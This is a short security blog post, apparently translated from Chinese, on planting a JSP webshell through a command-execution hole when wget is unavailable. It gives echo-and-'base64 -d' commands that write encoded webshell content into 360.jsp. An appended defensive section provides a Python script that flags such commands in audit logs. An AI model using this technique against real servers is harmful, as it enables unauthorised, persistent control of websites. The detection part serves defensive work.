Author:[email protected]
Original link: http://www.5ecurity.cn/index.php/archives/137/
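Sometimes we run into a website with a command execution vulnerability and want to write a one-line webshell or a full-featured JSP webshell to it.
Occasionally we are unlucky, or the policy is strict, and the following two situations come up:
The wget command does not exist. At this point we may want to use echo to write a webshell file (neirong is the file content, /目录/ is the target directory):
echo neirong > /目录/360.jsp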
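Here is the problem: a small or full-featured webshell contains all kinds of special characters that need escaping, so the content written to the file causes errors, fails to parse, and so on.
In this case we can base64-encode the content and decode it when writing it to the file, which solves the escaping problem perfectly.
The command is as follows (base64后的木马内容 stands for the base64-encoded webshell content):
echo base64后的木马内容 |base64 -d > 360.jsp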
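On the defending side, the command shape above (a base64 decode whose output is redirected into a server-side script file) stands out in shell or process audit logs. The following detection sketch is an added example, not part of the original post; the log lines are constructed, and the extension list and regular expressions are assumptions to adapt to your environment.

```python
import re

# Assumption: extensions a web/app server would execute if dropped in a web root.
SCRIPT_EXTS = ("jsp", "jspx", "php", "asp", "aspx")

# base64 in decode mode: -d, -D, --decode, or bundled short flags such as -di
B64_DECODE = re.compile(r"\bbase64\s+(?:-\w+\s+)*(?:-\w*[dD]\w*|--decode)\b")
# Output redirection (> or >>) or tee into a file with a script extension
SCRIPT_WRITE = re.compile(
    r"(?:>>?|\btee\s+(?:-a\s+)?)\s*['\"]?(\S+?\.(?:%s))['\"]?(?=\s|;|&|\||$)"
    % "|".join(SCRIPT_EXTS),
    re.IGNORECASE,
)

def flag_command(cmdline):
    """Return the target path if cmdline decodes base64 into a script file, else None."""
    m_dec = B64_DECODE.search(cmdline)
    if not m_dec:
        return None
    # Only consider writes that occur after the decode step in the pipeline.
    m_out = SCRIPT_WRITE.search(cmdline, m_dec.end())
    return m_out.group(1) if m_out else None

def scan(lines):
    """Yield (line_number, target_path) for every suspicious command line."""
    for n, line in enumerate(lines, 1):
        target = flag_command(line)
        if target:
            yield n, target

# Constructed sample audit lines (payloads replaced by a placeholder).
SAMPLE = [
    "tomcat sh -c echo <BASE64_PLACEHOLDER> |base64 -d > 360.jsp",
    "tomcat sh -c echo <BASE64_PLACEHOLDER> | base64 --decode >> /opt/app/webapps/ROOT/x.JSP",
    "deploy sh -c base64 -d bundle.b64 > bundle.tar.gz",
    "deploy sh -c echo hello > notes.jsp",
    "tomcat sh -c echo <BASE64_PLACEHOLDER> | base64 -d | tee /var/www/html/a.php",
]

if __name__ == "__main__":
    for n, target in scan(SAMPLE):
        print(f"line {n}: base64 decode written to {target}")
```

Pair a rule like this with file-integrity monitoring on the web root, since it only sees commands that reach the audit log in this literal form.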